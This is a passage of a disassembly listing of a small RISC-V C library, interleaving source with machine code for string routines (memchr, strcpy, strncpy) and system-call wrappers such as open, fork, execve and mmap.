a4,1(a5) 1968: 0785 addi a5,a5,1 196a: fb6d bnez a4,195c <strlen+0x4c> 196c: bf75 j 1928 <strlen+0x18> 000000000000196e <memchr>: void *memchr(const void *src, int c, size_t n) { const unsigned char *s = src; c = (unsigned char)c; for (; ((uintptr_t)s & ALIGN) && n && *s != c; s++, n--) 196e: 00757713 andi a4,a0,7 { 1972: 87aa mv a5,a0 c = (unsigned char)c; 1974: 0ff5f593 zext.b a1,a1 for (; ((uintptr_t)s & ALIGN) && n && *s != c; s++, n--) 1978: cb19 beqz a4,198e <memchr+0x20> 197a: ce25 beqz a2,19f2 <memchr+0x84> 197c: 0007c703 lbu a4,0(a5) 1980: 04b70e63 beq a4,a1,19dc <memchr+0x6e> 1984: 0785 addi a5,a5,1 1986: 0077f713 andi a4,a5,7 198a: 167d addi a2,a2,-1 198c: f77d bnez a4,197a <memchr+0xc> ; s = (const void *)w; } for (; n && *s != c; s++, n--) ; return n ? (void *)s : 0; 198e: 4501 li a0,0 if (n && *s != c) 1990: c235 beqz a2,19f4 <memchr+0x86> 1992: 0007c703 lbu a4,0(a5) 1996: 04b70363 beq a4,a1,19dc <memchr+0x6e> size_t k = ONES * c; 199a: 00000517 auipc a0,0x0 199e: 68653503 ld a0,1670(a0) # 2020 <__clone+0xf4> for (w = (const void *)s; n >= SS && !HASZERO(*w ^ k); w++, n -= SS) 19a2: 471d li a4,7 size_t k = ONES * c; 19a4: 02a58533 mul a0,a1,a0 for (w = (const void *)s; n >= SS && !HASZERO(*w ^ k); w++, n -= SS) 19a8: 02c77a63 bgeu a4,a2,19dc <memchr+0x6e> 19ac: 00000897 auipc a7,0x0 19b0: 6648b883 ld a7,1636(a7) # 2010 <__clone+0xe4> 19b4: 00000817 auipc a6,0x0 19b8: 66483803 ld a6,1636(a6) # 2018 <__clone+0xec> 19bc: 431d li t1,7 19be: a029 j 19c8 <memchr+0x5a> 19c0: 1661 addi a2,a2,-8 19c2: 07a1 addi a5,a5,8 19c4: 02c37963 bgeu t1,a2,19f6 <memchr+0x88> 19c8: 6398 ld a4,0(a5) 19ca: 8f29 xor a4,a4,a0 19cc: 011706b3 add a3,a4,a7 19d0: fff74713 not a4,a4 19d4: 8f75 and a4,a4,a3 19d6: 01077733 and a4,a4,a6 19da: d37d beqz a4,19c0 <memchr+0x52> 19dc: 853e mv a0,a5 19de: 97b2 add a5,a5,a2 19e0: a021 j 19e8 <memchr+0x7a> for (; n && *s != c; s++, n--) 19e2: 0505 addi a0,a0,1 19e4: 00f50763 beq a0,a5,19f2 <memchr+0x84> 19e8: 00054703 lbu a4,0(a0) 19ec: feb71be3 bne a4,a1,19e2 <memchr+0x74> 19f0: 8082 ret return n ? (void *)s : 0; 19f2: 4501 li a0,0 } 19f4: 8082 ret return n ? (void *)s : 0; 19f6: 4501 li a0,0 for (; n && *s != c; s++, n--) 19f8: f275 bnez a2,19dc <memchr+0x6e> } 19fa: 8082 ret 00000000000019fc <strnlen>: size_t strnlen(const char *s, size_t n) { 19fc: 1101 addi sp,sp,-32 19fe: e822 sd s0,16(sp) const char *p = memchr(s, 0, n); 1a00: 862e mv a2,a1 { 1a02: 842e mv s0,a1 const char *p = memchr(s, 0, n); 1a04: 4581 li a1,0 { 1a06: e426 sd s1,8(sp) 1a08: ec06 sd ra,24(sp) 1a0a: 84aa mv s1,a0 const char *p = memchr(s, 0, n); 1a0c: f63ff0ef jal ra,196e <memchr> return p ? p - s : n; 1a10: c519 beqz a0,1a1e <strnlen+0x22> } 1a12: 60e2 ld ra,24(sp) 1a14: 6442 ld s0,16(sp) return p ? p - s : n; 1a16: 8d05 sub a0,a0,s1 } 1a18: 64a2 ld s1,8(sp) 1a1a: 6105 addi sp,sp,32 1a1c: 8082 ret 1a1e: 60e2 ld ra,24(sp) return p ? p - s : n; 1a20: 8522 mv a0,s0 } 1a22: 6442 ld s0,16(sp) 1a24: 64a2 ld s1,8(sp) 1a26: 6105 addi sp,sp,32 1a28: 8082 ret 0000000000001a2a <strcpy>: char *strcpy(char *restrict d, const char *s) { typedef size_t __attribute__((__may_alias__)) word; word *wd; const word *ws; if ((uintptr_t)s % SS == (uintptr_t)d % SS) 1a2a: 00b547b3 xor a5,a0,a1 1a2e: 8b9d andi a5,a5,7 1a30: eb95 bnez a5,1a64 <strcpy+0x3a> { for (; (uintptr_t)s % SS; s++, d++) 1a32: 0075f793 andi a5,a1,7 1a36: e7b1 bnez a5,1a82 <strcpy+0x58> if (!(*d = *s)) return d; wd = (void *)d; ws = (const void *)s; for (; !HASZERO(*ws); *wd++ = *ws++) 1a38: 6198 ld a4,0(a1) 1a3a: 00000617 auipc a2,0x0 1a3e: 5d663603 ld a2,1494(a2) # 2010 <__clone+0xe4> 1a42: 00000817 auipc a6,0x0 1a46: 5d683803 ld a6,1494(a6) # 2018 <__clone+0xec> 1a4a: a029 j 1a54 <strcpy+0x2a> 1a4c: e118 sd a4,0(a0) 1a4e: 6598 ld a4,8(a1) 1a50: 05a1 addi a1,a1,8 1a52: 0521 addi a0,a0,8 1a54: 00c707b3 add a5,a4,a2 1a58: fff74693 not a3,a4 1a5c: 8ff5 and a5,a5,a3 1a5e: 0107f7b3 and a5,a5,a6 1a62: d7ed beqz a5,1a4c <strcpy+0x22> ; d = (void *)wd; s = (const void *)ws; } for (; (*d = *s); s++, d++) 1a64: 0005c783 lbu a5,0(a1) 1a68: 00f50023 sb a5,0(a0) 1a6c: c785 beqz a5,1a94 <strcpy+0x6a> 1a6e: 0015c783 lbu a5,1(a1) 1a72: 0505 addi a0,a0,1 1a74: 0585 addi a1,a1,1 1a76: 00f50023 sb a5,0(a0) 1a7a: fbf5 bnez a5,1a6e <strcpy+0x44> ; return d; } 1a7c: 8082 ret for (; (uintptr_t)s % SS; s++, d++) 1a7e: 0505 addi a0,a0,1 1a80: df45 beqz a4,1a38 <strcpy+0xe> if (!(*d = *s)) 1a82: 0005c783 lbu a5,0(a1) for (; (uintptr_t)s % SS; s++, d++) 1a86: 0585 addi a1,a1,1 1a88: 0075f713 andi a4,a1,7 if (!(*d = *s)) 1a8c: 00f50023 sb a5,0(a0) 1a90: f7fd bnez a5,1a7e <strcpy+0x54> } 1a92: 8082 ret 1a94: 8082 ret 0000000000001a96 <strncpy>: char *strncpy(char *restrict d, const char *s, size_t n) { typedef size_t __attribute__((__may_alias__)) word; word *wd; const word *ws; if (((uintptr_t)s & ALIGN) == ((uintptr_t)d & ALIGN)) 1a96: 00b547b3 xor a5,a0,a1 1a9a: 8b9d andi a5,a5,7 1a9c: 1a079863 bnez a5,1c4c <strncpy+0x1b6> { for (; ((uintptr_t)s & ALIGN) && n && (*d = *s); n--, s++, d++) 1aa0: 0075f793 andi a5,a1,7 1aa4: 16078463 beqz a5,1c0c <strncpy+0x176> 1aa8: ea01 bnez a2,1ab8 <strncpy+0x22> 1aaa: a421 j 1cb2 <strncpy+0x21c> 1aac: 167d addi a2,a2,-1 1aae: 0505 addi a0,a0,1 1ab0: 14070e63 beqz a4,1c0c <strncpy+0x176> 1ab4: 1a060863 beqz a2,1c64 <strncpy+0x1ce> 1ab8: 0005c783 lbu a5,0(a1) 1abc: 0585 addi a1,a1,1 1abe: 0075f713 andi a4,a1,7 1ac2: 00f50023 sb a5,0(a0) 1ac6: f3fd bnez a5,1aac <strncpy+0x16> 1ac8: 4805 li a6,1 1aca: 1a061863 bnez a2,1c7a <strncpy+0x1e4> 1ace: 40a007b3 neg a5,a0 1ad2: 8b9d andi a5,a5,7 1ad4: 4681 li a3,0 1ad6: 18061a63 bnez a2,1c6a <strncpy+0x1d4> 1ada: 00778713 addi a4,a5,7 1ade: 45ad li a1,11 1ae0: 18b76363 bltu a4,a1,1c66 <strncpy+0x1d0> 1ae4: 1ae6eb63 bltu a3,a4,1c9a <strncpy+0x204> 1ae8: 1a078363 beqz a5,1c8e <strncpy+0x1f8> for (int i = 0; i < n; ++i, *(p++) = c) 1aec: 00050023 sb zero,0(a0) 1af0: 4685 li a3,1 1af2: 00150713 addi a4,a0,1 1af6: 18d78f63 beq a5,a3,1c94 <strncpy+0x1fe> 1afa: 000500a3 sb zero,1(a0) 1afe: 4689 li a3,2 1b00: 00250713 addi a4,a0,2 1b04: 18d78e63 beq a5,a3,1ca0 <strncpy+0x20a> 1b08: 00050123 sb zero,2(a0) 1b0c: 468d li a3,3 1b0e: 00350713 addi a4,a0,3 1b12: 16d78c63 beq a5,a3,1c8a <strncpy+0x1f4> 1b16: 000501a3 sb zero,3(a0) 1b1a: 4691 li a3,4 1b1c: 00450713 addi a4,a0,4 1b20: 18d78263 beq a5,a3,1ca4 <strncpy+0x20e> 1b24: 00050223 sb zero,4(a0) 1b28: 4695 li a3,5 1b2a: 00550713 addi a4,a0,5 1b2e: 16d78d63 beq a5,a3,1ca8 <strncpy+0x212> 1b32: 000502a3 sb zero,5(a0) 1b36: 469d li a3,7 1b38: 00650713 addi a4,a0,6 1b3c: 16d79863 bne a5,a3,1cac <strncpy+0x216> 1b40: 00750713 addi a4,a0,7 1b44: 00050323 sb zero,6(a0) 1b48: 40f80833 sub a6,a6,a5 1b4c: ff887593 andi a1,a6,-8 1b50: 97aa add a5,a5,a0 1b52: 95be add a1,a1,a5 1b54: 0007b023 sd zero,0(a5) 1b58: 07a1 addi a5,a5,8 1b5a: feb79de3 bne a5,a1,1b54 <strncpy+0xbe> 1b5e: ff887593 andi a1,a6,-8 1b62: 9ead addw a3,a3,a1 1b64: 00b707b3 add a5,a4,a1 1b68: 12b80863 beq a6,a1,1c98 <strncpy+0x202> 1b6c: 00078023 sb zero,0(a5) 1b70: 0016871b addiw a4,a3,1 1b74: 0ec77863 bgeu a4,a2,1c64 <strncpy+0x1ce> 1b78: 000780a3 sb zero,1(a5) 1b7c: 0026871b addiw a4,a3,2 1b80: 0ec77263 bgeu a4,a2,1c64 <strncpy+0x1ce> 1b84: 00078123 sb zero,2(a5) 1b88: 0036871b addiw a4,a3,3 1b8c: 0cc77c63 bgeu a4,a2,1c64 <strncpy+0x1ce> 1b90: 000781a3 sb zero,3(a5) 1b94: 0046871b addiw a4,a3,4 1b98: 0cc77663 bgeu a4,a2,1c64 <strncpy+0x1ce> 1b9c: 00078223 sb zero,4(a5) 1ba0: 0056871b addiw a4,a3,5 1ba4: 0cc77063 bgeu a4,a2,1c64 <strncpy+0x1ce> 1ba8: 000782a3 sb zero,5(a5) 1bac: 0066871b addiw a4,a3,6 1bb0: 0ac77a63 bgeu a4,a2,1c64 <strncpy+0x1ce> 1bb4: 00078323 sb zero,6(a5) 1bb8: 0076871b addiw a4,a3,7 1bbc: 0ac77463 bgeu a4,a2,1c64 <strncpy+0x1ce> 1bc0: 000783a3 sb zero,7(a5) 1bc4: 0086871b addiw a4,a3,8 1bc8: 08c77e63 bgeu a4,a2,1c64 <strncpy+0x1ce> 1bcc: 00078423 sb zero,8(a5) 1bd0: 0096871b addiw a4,a3,9 1bd4: 08c77863 bgeu a4,a2,1c64 <strncpy+0x1ce> 1bd8: 000784a3 sb zero,9(a5) 1bdc: 00a6871b addiw a4,a3,10 1be0: 08c77263 bgeu a4,a2,1c64 <strncpy+0x1ce> 1be4: 00078523 sb zero,10(a5) 1be8: 00b6871b addiw a4,a3,11 1bec: 06c77c63 bgeu a4,a2,1c64 <strncpy+0x1ce> 1bf0: 000785a3 sb zero,11(a5) 1bf4: 00c6871b addiw a4,a3,12 1bf8: 06c77663 bgeu a4,a2,1c64 <strncpy+0x1ce> 1bfc: 00078623 sb zero,12(a5) 1c00: 26b5 addiw a3,a3,13 1c02: 06c6f163 bgeu a3,a2,1c64 <strncpy+0x1ce> 1c06: 000786a3 sb zero,13(a5) 1c0a: 8082 ret ; if (!n || !*s) 1c0c: c645 beqz a2,1cb4 <strncpy+0x21e> 1c0e: 0005c783 lbu a5,0(a1) 1c12: ea078be3 beqz a5,1ac8 <strncpy+0x32> goto tail; wd = (void *)d; ws = (const void *)s; for (; n >= sizeof(size_t) && !HASZERO(*ws); n -= sizeof(size_t), ws++, wd++) 1c16: 479d li a5,7 1c18: 02c7ff63 bgeu a5,a2,1c56 <strncpy+0x1c0> 1c1c: 00000897 auipc a7,0x0 1c20: 3f48b883 ld a7,1012(a7) # 2010 <__clone+0xe4> 1c24: 00000817 auipc a6,0x0 1c28: 3f483803 ld a6,1012(a6) # 2018 <__clone+0xec> 1c2c: 431d li t1,7 1c2e: 6198 ld a4,0(a1) 1c30: 011707b3 add a5,a4,a7 1c34: fff74693 not a3,a4 1c38: 8ff5 and a5,a5,a3 1c3a: 0107f7b3 and a5,a5,a6 1c3e: ef81 bnez a5,1c56 <strncpy+0x1c0> *wd = *ws; 1c40: e118 sd a4,0(a0) for (; n >= sizeof(size_t) && !HASZERO(*ws); n -= sizeof(size_t), ws++, wd++) 1c42: 1661 addi a2,a2,-8 1c44: 05a1 addi a1,a1,8 1c46: 0521 addi a0,a0,8 1c48: fec363e3 bltu t1,a2,1c2e <strncpy+0x198> d = (void *)wd; s = (const void *)ws; } for (; n && (*d = *s); n--, s++, d++) 1c4c: e609 bnez a2,1c56 <strncpy+0x1c0> 1c4e: a08d j 1cb0 <strncpy+0x21a> 1c50: 167d addi a2,a2,-1 1c52: 0505 addi a0,a0,1 1c54: ca01 beqz a2,1c64 <strncpy+0x1ce> 1c56: 0005c783 lbu a5,0(a1) 1c5a: 0585 addi a1,a1,1 1c5c: 00f50023 sb a5,0(a0) 1c60: fbe5 bnez a5,1c50 <strncpy+0x1ba> ; tail: 1c62: b59d j 1ac8 <strncpy+0x32> memset(d, 0, n); return d; } 1c64: 8082 ret 1c66: 472d li a4,11 1c68: bdb5 j 1ae4 <strncpy+0x4e> 1c6a: 00778713 addi a4,a5,7 1c6e: 45ad li a1,11 1c70: fff60693 addi a3,a2,-1 1c74: e6b778e3 bgeu a4,a1,1ae4 <strncpy+0x4e> 1c78: b7fd j 1c66 <strncpy+0x1d0> 1c7a: 40a007b3 neg a5,a0 1c7e: 8832 mv a6,a2 1c80: 8b9d andi a5,a5,7 1c82: 4681 li a3,0 1c84: e4060be3 beqz a2,1ada <strncpy+0x44> 1c88: b7cd j 1c6a <strncpy+0x1d4> for (int i = 0; i < n; ++i, *(p++) = c) 1c8a: 468d li a3,3 1c8c: bd75 j 1b48 <strncpy+0xb2> 1c8e: 872a mv a4,a0 1c90: 4681 li a3,0 1c92: bd5d j 1b48 <strncpy+0xb2> 1c94: 4685 li a3,1 1c96: bd4d j 1b48 <strncpy+0xb2> 1c98: 8082 ret 1c9a: 87aa mv a5,a0 1c9c: 4681 li a3,0 1c9e: b5f9 j 1b6c <strncpy+0xd6> 1ca0: 4689 li a3,2 1ca2: b55d j 1b48 <strncpy+0xb2> 1ca4: 4691 li a3,4 1ca6: b54d j 1b48 <strncpy+0xb2> 1ca8: 4695 li a3,5 1caa: bd79 j 1b48 <strncpy+0xb2> 1cac: 4699 li a3,6 1cae: bd69 j 1b48 <strncpy+0xb2> 1cb0: 8082 ret 1cb2: 8082 ret 1cb4: 8082 ret 0000000000001cb6 <open>: #include <unistd.h> #include "syscall.h" int open(const char *path, int flags) { 1cb6: 87aa mv a5,a0 1cb8: 862e mv a2,a1 __asm_syscall("r"(a7), "0"(a0), "r"(a1), "r"(a2)) } static inline long __syscall4(long n, long a, long b, long c, long d) { register long a7 __asm__("a7") = n; 1cba: 03800893 li a7,56 register long a0 __asm__("a0") = a; 1cbe: f9c00513 li a0,-100 register long a1 __asm__("a1") = b; 1cc2: 85be mv a1,a5 register long a2 __asm__("a2") = c; register long a3 __asm__("a3") = d; 1cc4: 4689 li a3,2 __asm_syscall("r"(a7), "0"(a0), "r"(a1), "r"(a2), "r"(a3)) 1cc6: 00000073 ecall return syscall(SYS_openat, AT_FDCWD, path, flags, O_RDWR); } 1cca: 2501 sext.w a0,a0 1ccc: 8082 ret 0000000000001cce <openat>: register long a7 __asm__("a7") = n; 1cce: 03800893 li a7,56 register long a3 __asm__("a3") = d; 1cd2: 18000693 li a3,384 __asm_syscall("r"(a7), "0"(a0), "r"(a1), "r"(a2), "r"(a3)) 1cd6: 00000073 ecall int openat(int dirfd,const char *path, int flags) { return syscall(SYS_openat, dirfd, path, flags, 0600); } 1cda: 2501 sext.w a0,a0 1cdc: 8082 ret 0000000000001cde <close>: register long a7 __asm__("a7") = n; 1cde: 03900893 li a7,57 __asm_syscall("r"(a7), "0"(a0)) 1ce2: 00000073 ecall int close(int fd) { return syscall(SYS_close, fd); } 1ce6: 2501 sext.w a0,a0 1ce8: 8082 ret 0000000000001cea <read>: register long a7 __asm__("a7") = n; 1cea: 03f00893 li a7,63 __asm_syscall("r"(a7), "0"(a0), "r"(a1), "r"(a2)) 1cee: 00000073 ecall ssize_t read(int fd, void *buf, size_t len) { return syscall(SYS_read, fd, buf, len); } 1cf2: 8082 ret 0000000000001cf4 <write>: register long a7 __asm__("a7") = n; 1cf4: 04000893 li a7,64 __asm_syscall("r"(a7), "0"(a0), "r"(a1), "r"(a2)) 1cf8: 00000073 ecall ssize_t write(int fd, const void *buf, size_t len) { return syscall(SYS_write, fd, buf, len); } 1cfc: 8082 ret 0000000000001cfe <getpid>: register long a7 __asm__("a7") = n; 1cfe: 0ac00893 li a7,172 __asm_syscall("r"(a7)) 1d02: 00000073 ecall pid_t getpid(void) { return syscall(SYS_getpid); } 1d06: 2501 sext.w a0,a0 1d08: 8082 ret 0000000000001d0a <getppid>: register long a7 __asm__("a7") = n; 1d0a: 0ad00893 li a7,173 __asm_syscall("r"(a7)) 1d0e: 00000073 ecall pid_t getppid(void) { return syscall(SYS_getppid); } 1d12: 2501 sext.w a0,a0 1d14: 8082 ret 0000000000001d16 <sched_yield>: register long a7 __asm__("a7") = n; 1d16: 07c00893 li a7,124 __asm_syscall("r"(a7)) 1d1a: 00000073 ecall int sched_yield(void) { return syscall(SYS_sched_yield); } 1d1e: 2501 sext.w a0,a0 1d20: 8082 ret 0000000000001d22 <fork>: register long a7 __asm__("a7") = n; 1d22: 0dc00893 li a7,220 register long a0 __asm__("a0") = a; 1d26: 4545 li a0,17 register long a1 __asm__("a1") = b; 1d28: 4581 li a1,0 __asm_syscall("r"(a7), "0"(a0), "r"(a1)) 1d2a: 00000073 ecall pid_t fork(void) { return syscall(SYS_clone, SIGCHLD, 0); } 1d2e: 2501 sext.w a0,a0 1d30: 8082 ret 0000000000001d32 <clone>: pid_t clone(int (*fn)(void *arg), void *arg, void *stack, size_t stack_size, unsigned long flags) { 1d32: 85b2 mv a1,a2 1d34: 863a mv a2,a4 if (stack) 1d36: c191 beqz a1,1d3a <clone+0x8> stack += stack_size; 1d38: 95b6 add a1,a1,a3 return __clone(fn, stack, flags, NULL, NULL, NULL); 1d3a: 4781 li a5,0 1d3c: 4701 li a4,0 1d3e: 4681 li a3,0 1d40: 2601 sext.w a2,a2 1d42: a2ed j 1f2c <__clone> 0000000000001d44 <exit>: register long a7 __asm__("a7") = n; 1d44: 05d00893 li a7,93 __asm_syscall("r"(a7), "0"(a0)) 1d48: 00000073 ecall //return syscall(SYS_clone, fn, stack, flags, NULL, NULL, NULL); } void exit(int code) { syscall(SYS_exit, code); } 1d4c: 8082 ret 0000000000001d4e <waitpid>: register long a7 __asm__("a7") = n; 1d4e: 10400893 li a7,260 register long a3 __asm__("a3") = d; 1d52: 4681 li a3,0 __asm_syscall("r"(a7), "0"(a0), "r"(a1), "r"(a2), "r"(a3)) 1d54: 00000073 ecall int waitpid(int pid, int *code, int options) { return syscall(SYS_wait4, pid, code, options, 0); } 1d58: 2501 sext.w a0,a0 1d5a: 8082 ret 0000000000001d5c <exec>: register long a7 __asm__("a7") = n; 1d5c: 0dd00893 li a7,221 __asm_syscall("r"(a7), "0"(a0)) 1d60: 00000073 ecall int exec(char *name) { return syscall(SYS_execve, name); } 1d64: 2501 sext.w a0,a0 1d66: 8082 ret 0000000000001d68 <execve>: register long a7 __asm__("a7") = n; 1d68: 0dd00893 li a7,221 __asm_syscall("r"(a7), "0"(a0), "r"(a1), "r"(a2)) 1d6c: 00000073 ecall int execve(const char *name, char *const argv[], char *const argp[]) { return syscall(SYS_execve, name, argv, argp); } 1d70: 2501 sext.w a0,a0 1d72: 8082 ret 0000000000001d74 <times>: register long a7 __asm__("a7") = n; 1d74: 09900893 li a7,153 __asm_syscall("r"(a7), "0"(a0)) 1d78: 00000073 ecall int times(void *mytimes) { return syscall(SYS_times, mytimes); } 1d7c: 2501 sext.w a0,a0 1d7e: 8082 ret 0000000000001d80 <get_time>: int64 get_time() { 1d80: 1141 addi sp,sp,-16 register long a7 __asm__("a7") = n; 1d82: 0a900893 li a7,169 register long a0 __asm__("a0") = a; 1d86: 850a mv a0,sp register long a1 __asm__("a1") = b; 1d88: 4581 li a1,0 __asm_syscall("r"(a7), "0"(a0), "r"(a1)) 1d8a: 00000073 ecall TimeVal time; int err = sys_get_time(&time, 0); if (err == 0) 1d8e: 2501 sext.w a0,a0 1d90: ed09 bnez a0,1daa <get_time+0x2a> { return ((time.sec & 0xffff) * 1000 + time.usec / 1000); 1d92: 67a2 ld a5,8(sp) 1d94: 3e800713 li a4,1000 1d98: 00015503 lhu a0,0(sp) 1d9c: 02e7d7b3 divu a5,a5,a4 1da0: 02e50533 mul a0,a0,a4 1da4: 953e add a0,a0,a5 } else { return -1; } } 1da6: 0141 addi sp,sp,16 1da8: 8082 ret return -1; 1daa: 557d li a0,-1 1dac: bfed j 1da6 <get_time+0x26> 0000000000001dae <sys_get_time>: register long a7 __asm__("a7") = n; 1dae: 0a900893 li a7,169 __asm_syscall("r"(a7), "0"(a0), "r"(a1)) 1db2: 00000073 ecall int sys_get_time(TimeVal *ts, int tz) { return syscall(SYS_gettimeofday, ts, tz); } 1db6: 2501 sext.w a0,a0 1db8: 8082 ret 0000000000001dba <time>: register long a7 __asm__("a7") = n; 1dba: 42600893 li a7,1062 __asm_syscall("r"(a7), "0"(a0)) 1dbe: 00000073 ecall int time(unsigned long *tloc) { return syscall(SYS_time, tloc); } 1dc2: 2501 sext.w a0,a0 1dc4: 8082 ret 0000000000001dc6 <sleep>: int sleep(unsigned long long time) { 1dc6: 1141 addi sp,sp,-16 TimeVal tv = {.sec = time, .usec = 0}; 1dc8: e02a sd a0,0(sp) register long a0 __asm__("a0") = a; 1dca: 850a mv a0,sp 1dcc: e402 sd zero,8(sp) register long a7 __asm__("a7") = n; 1dce: 06500893 li a7,101 register long a1 __asm__("a1") = b; 1dd2: 85aa mv a1,a0 __asm_syscall("r"(a7), "0"(a0), "r"(a1)) 1dd4: 00000073 ecall if (syscall(SYS_nanosleep, &tv, &tv)) return tv.sec; 1dd8: e501 bnez a0,1de0 <sleep+0x1a> return 0; 1dda: 4501 li a0,0 } 1ddc: 0141 addi sp,sp,16 1dde: 8082 ret if (syscall(SYS_nanosleep, &tv, &tv)) return tv.sec; 1de0: 4502 lw a0,0(sp) } 1de2: 0141 addi sp,sp,16 1de4: 8082 ret 0000000000001de6 <set_priority>: register long a7 __asm__("a7") = n; 1de6: 08c00893 li a7,140 __asm_syscall("r"(a7), "0"(a0)) 1dea: 00000073 ecall int set_priority(int prio) { return syscall(SYS_setpriority, prio); } 1dee: 2501 sext.w a0,a0 1df0: 8082 ret 0000000000001df2 <mmap>: __asm_syscall("r"(a7), "0"(a0), "r"(a1), "r"(a2), "r"(a3), "r"(a4)) } static inline long __syscall6(long n, long a, long b, long c, long d, long e, long f) { register long a7 __asm__("a7") = n; 1df2: 0de00893 li a7,222 register long a1 __asm__("a1") = b; register long a2 __asm__("a2") = c; register long a3 __asm__("a3") = d; register long a4 __asm__("a4") = e; register long a5 __asm__("a5") = f; __asm_syscall("r"(a7), "0"(a0), "r"(a1), "r"(a2), "r"(a3), "r"(a4), "r"(a5)) 1df6: 00000073 ecall void *mmap(void *start, size_t len, int prot, int flags, int fd, off_t off) { return syscall(SYS_mmap, start, len, prot, flags, fd, off); } 1dfa: 8082 ret 0000000000001dfc <munmap>: register long a7 __asm__("a7") = n; 1dfc: 0d700893 li a7,215 __asm_syscall("r"(a7), "0"(a0), "r"(a1)) 1e00: 00000073 ecall int munmap(void *start, size_t len) { return syscall(SYS_munmap, start, len); } 1e04: 2501 sext.w a0,a0 1e06: 8082 ret 0000000000001e08 <wait>: int wait(int *code) { 1e08: 85aa mv a1,a0 register long a7 __asm__("a7") = n; 1e0a: 10400893 li a7,260 register long a0 __asm__("a0") = a; 1e0e: 557d li a0,-1 register long a2 __asm__("a2") = c; 1e10: 4601 li a2,0 register long a3 __asm__("a3") = d; 1e12: 4681 li a3,0 __asm_syscall("r"(a7), "0"(a0), "r"(a1), "r"(a2), "r"(a3)) 1e14: 00000073 ecall return waitpid((int)-1, code, 0); } 1e18: 2501 sext.w a0,a0 1e1a: 8082 ret 0000000000001e1c <spawn>: register long a7 __asm__("a7") = n; 1e1c: 19000893 li a7,400 __asm_syscall("r"(a7), "0"(a0)) 1e20: 00000073 ecall int spawn(char *file) { return syscall(SYS_spawn, file); } 1e24: 2501 sext.w a0,a0 1e26: 8082 ret 0000000000001e28 <mailread>: register long a7 __asm__("a7") = n; 1e28: 19100893 li a7,401 __asm_syscall("r"(a7), "0"(a0), "r"(a1)) 1e2c: 00000073 ecall int mailread(void *buf, int len) { return syscall(SYS_mailread, buf, len); } 1e30: 2501 sext.w a0,a0 1e32: 8082 ret 0000000000001e34 <mailwrite>: register long a7 __asm__("a7") = n; 1e34: 19200893 li a7,402 __asm_syscall("r"(a7), "0"(a0), "r"(a1), "r"(a2)) 1e38: 00000073 ecall int mailwrite(int pid, void *buf, int len) { return syscall(SYS_mailwrite, pid, buf, len); } 1e3c: 2501 sext.w a0,a0 1e3e: 8082 ret 0000000000001e40 <fstat>: register long a7 __asm__("a7") = n; 1e40: 05000893 li a7,80 __asm_syscall("r"(a7), "0"(a0), "r"(a1)) 1e44: 00000073 ecall int fstat(int fd, struct kstat *st) { return syscall(SYS_fstat, fd, st); } 1e48: 2501 sext.w a0,a0 1e4a: 8082 ret 0000000000001e4c <sys_linkat>: register long a4 __asm__("a4") = e; 1e4c: 1702 slli a4,a4,0x20 register long a7 __asm__("a7") = n; 1e4e: 02500893 li a7,37 register long a4 __asm__("a4") = e; 1e52: 9301 srli a4,a4,0x20 __asm_syscall("r"(a7), "0"(a0), "r"(a1), "r"(a2), "r"(a3), "r"(a4)) 1e54: 00000073 ecall int sys_linkat(int olddirfd, char *oldpath, int newdirfd, char *newpath, unsigned int flags) { return syscall(SYS_linkat, olddirfd, oldpath, newdirfd, newpath, flags); } 1e58: 2501 sext.w a0,a0 1e5a: 8082 ret 0000000000001e5c <sys_unlinkat>: register long a2 __asm__("a2") = c; 1e5c: 1602 slli a2,a2,0x20 register long a7 __asm__("a7") = n; 1e5e: 02300893 li a7,35 register long a2 __asm__("a2") = c; 1e62: 9201 srli a2,a2,0x20 __asm_syscall("r"(a7), "0"(a0), "r"(a1), "r"(a2)) 1e64: 00000073 ecall int sys_unlinkat(int dirfd, char *path, unsigned int flags) { return syscall(SYS_unlinkat, dirfd, path, flags); } 1e68: 2501 sext.w a0,a0 1e6a: 8082 ret 0000000000001e6c <link>: int link(char *old_path, char *new_path) { 1e6c: 87aa mv a5,a0 1e6e: 86ae mv a3,a1 register long a7 __asm__("a7") = n; 1e70: 02500893 li a7,37 register long a0 __asm__("a0") = a; 1e74: f9c00513 li a0,-100 register long a1 __asm__("a1") = b; 1e78: 85be mv a1,a5 register long a2 __asm__("a2") = c; 1e7a: f9c00613 li a2,-100 register long a4 __asm__("a4") = e; 1e7e: 4701 li a4,0 __asm_syscall("r"(a7), "0"(a0), "r"(a1), "r"(a2), "r"(a3), "r"(a4)) 1e80: 00000073 ecall return sys_linkat(AT_FDCWD, old_path, AT_FDCWD, new_path, 0); } 1e84: 2501 sext.w a0,a0 1e86: 8082 ret 0000000000001e88 <unlink>: int unlink(char *path) { 1e88: 85aa mv a1,a0 register long a7 __asm__("a7") = n; 1e8a: 02300893 li a7,35 register long a0 __asm__("a0") = a; 1e8e: f9c00513 li a0,-100 register long a2 __asm__("a2") = c; 1e92: 4601 li a2,0 __asm_syscall("r"(a7), "0"(a0), "r"(a1), "r"(a2)) 1e94: 00000073 ecall return sys_unlinkat(AT_FDCWD, path, 0); } 1e98: 2501 sext.w a0,a0 1e9a: 8082 ret 0000000000001e9c <uname>: register long a7 __asm__("a7") = n; 1e9c: 0a000893 li a7,160 __asm_syscall("r"(a7), "0"(a0)) 1ea0: 00000073 ecall int uname(void *buf) { return syscall(SYS_uname, buf); } 1ea4: 2501 sext.w a0,a0 1ea6: 8082 ret 0000000000001ea8 <brk>: register long a7 __asm__("a7") = n; 1ea8: 0d600893 li a7,214 __asm_syscall("r"(a7), "0"(a0)) 1eac: 00000073 ecall int brk(void *addr) { return syscall(SYS_brk, addr); } 1eb0: 2501 sext.w a0,a0 1eb2: 8082 ret 0000000000001eb4 <getcwd>: register long a7 __asm__("a7") = n; 1eb4: 48c5 li a7,17 __asm_syscall("r"(a7), "0"(a0), "r"(a1)) 1eb6: 00000073 ecall char *getcwd(char *buf, size_t size){ return syscall(SYS_getcwd, buf, size); } 1eba: 8082 ret 0000000000001ebc <chdir>: register long a7 __asm__("a7") = n; 1ebc: 03100893 li a7,49 __asm_syscall("r"(a7), "0"(a0)) 1ec0: 00000073 ecall int chdir(const char *path){ return syscall(SYS_chdir, path); } 1ec4: 2501 sext.w a0,a0 1ec6: 8082 ret 0000000000001ec8 <mkdir>: int mkdir(const char *path, mode_t mode){ 1ec8: 862e mv a2,a1 1eca: 87aa mv a5,a0 register long a2 __asm__("a2") = c; 1ecc: 1602 slli a2,a2,0x20 register long a7 __asm__("a7") = n; 1ece: 02200893 li a7,34 register long a0 __asm__("a0") = a; 1ed2: f9c00513 li 